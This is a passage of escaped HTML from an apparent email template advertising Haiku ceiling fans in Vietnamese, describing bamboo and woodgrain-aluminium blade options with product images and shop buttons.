12px;\\\"><span style=\\\"color: #3598db; line-height: 24px;\\\"><em>V\\u1edbi \\u0111\\u1eb7c t\\u00ednh d\\u1ec5 ph\\u1ed1i t\\u00f9y ch\\u1ec9nh n\\u1ed9i th\\u1ea5t thi\\u1ebft k\\u1ebf. Ch\\u00fang t\\u00f4i l\\u00e0 nh\\u00e0 cung c\\u1ea5p c\\u00f3 uy t\\u00edn cho d\\u00f2ng qu\\u1ea1t tr\\u1ea7n n\\u00e0y t\\u1ea1i Vi\\u1ec7t Nam<\\/em><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:37px; v-text-anchor:middle; width:129px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#236fa1\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #236fa1; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677920448078-b_wooden.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 380px;\\\" width=\\\"380\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #444444; line-height: 200%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 200%;\\\"><span style=\\\"font-size: 12px; line-height: 24px;\\\">Nh\\u1eefng chi\\u1ebfc c\\u00e1nh qu\\u1ea1t b\\u1eb1ng tre Moso tuy\\u1ec7t \\u0111\\u1eb9p c\\u1ee7a Haiku \\u0111\\u01b0\\u1ee3c l\\u00e0m th\\u1ee7 c\\u00f4ng t\\u1eeb nh\\u1eefng v\\u1eadt li\\u1ec7u \\u0111\\u01b0\\u1ee3c ch\\u1ecdn l\\u1ef1a c\\u00e2y tre \\u0111\\u1ee7 tu\\u1ed5i. V\\u1edbi 5 l\\u1edbp tre cung c\\u1ea5p \\u0111\\u1ed9 b\\u1ec1n cao v\\u00e0 t\\u1ea1o c\\u1ea3m gi\\u00e1c nh\\u1eb9 nh\\u00e0ng, t\\u1ef1 nhi\\u00ean cho b\\u1ea5t k\\u1ef3 kh\\u00f4ng gian n\\u00e0o.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 200%;\\\"><span style=\\\"color: #e67e23; line-height: 28px;\\\"><em><span style=\\\"font-size: 12px; line-height: 24px;\\\">Duy nh\\u1ea5t qu\\u1ea1t tr\\u1ea7n Haiku - c\\u1ee7a h\\u00e3ng Big Ass Fans USA l\\u00e0m \\u0111\\u01b0\\u1ee3c c\\u00e1nh qu\\u1ea1t tr\\u1ea7n v\\u1edbi ch\\u1ea5t li\\u1ec7u tre. H\\u00e3y li\\u00ean h\\u1ec7 bi\\u1ebft th\\u00eam chi ti\\u1ebft.<\\/span><\\/em><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:37px; v-text-anchor:middle; width:129px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#236fa1\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #236fa1; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677920949198-bamboo.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 380px;\\\" width=\\\"380\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:28px 33px 25px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #444444; line-height: 180%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 180%;\\\"><span style=\\\"font-size: 12px; line-height: 25.2px;\\\">Qu\\u1ea1t tr\\u1ea7n s\\u1eed d\\u1ee5ng c\\u00e1nh <strong>Woodgrain Alu<\\/strong> s\\u1ed1ng \\u0111\\u1ed9ng m\\u00e0u s\\u1eafc ph\\u00f9 h\\u1ee3p v\\u1edbi nhi\\u1ec1u thi\\u1ebft k\\u1ebf hi\\u1ec7n nay. M\\u00e0u s\\u1eafc <strong>Woodgrain Alu<\\/strong> cho c\\u1ea3m gi\\u00e1c nh\\u01b0 g\\u1ed7 th\\u1eadt v\\u00e0 c\\u00f3 \\u0111\\u1ed9 b\\u1ec1n cao, gi\\u00e1 tr\\u1ecb h\\u01a1n khi s\\u1eed d\\u1ee5ng nh\\u00f4m c\\u1ea5p m\\u00e1y bay. \\u0110\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng \\u1edf nh\\u1eefng v\\u1ecb tr\\u00ed ngo\\u00e0i tr\\u1eddi, c\\u00f4ng nghi\\u1ec7p nh\\u00e0 x\\u01b0\\u1edfng ho\\u1eb7c n\\u01a1i c\\u00f3 nhi\\u1ec7t \\u0111\\u1ed9 v\\u00e0 \\u0111\\u1ed9 \\u1ea9m cao.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 180%;\\\"><em><span style=\\\"font-size: 12px; line-height: 25.2px;\\\">Hi\\u1ec7n nay, d\\u00f2ng s\\u1ea3n ph\\u1ea9m c\\u00e1nh v\\u00e2n g\\u1ed7 Woodgrain c\\u00f3 gi\\u00e1 th\\u00e0nh s\\u1ea3n xu\\u1ea5t r\\u1ea5t cao.\\u00a0<\\/span><\\/em><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:37px; v-text-anchor:middle; width:129px;\\\" arcsize=\\\"11%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#236fa1\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #236fa1; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"400\\\" style=\\\"width: 400px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 400px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677919995846-go-alu.png\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 380px;\\\" width=\\\"380\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 800px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:800px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"800\\\" style=\\\"width: 800px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 800px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:47px; v-text-anchor:middle; width:359px;\\\" arcsize=\\\"85%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#272362\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:helvetica,sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:helvetica,sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #272362; border-radius: 40px;-webkit-border-radius: 40px; -moz-border-radius: 40px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:15px 44px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">Shop - QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6 T\\u1ef0 NHI\\u00caN<\\/span><\\/strong><\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td 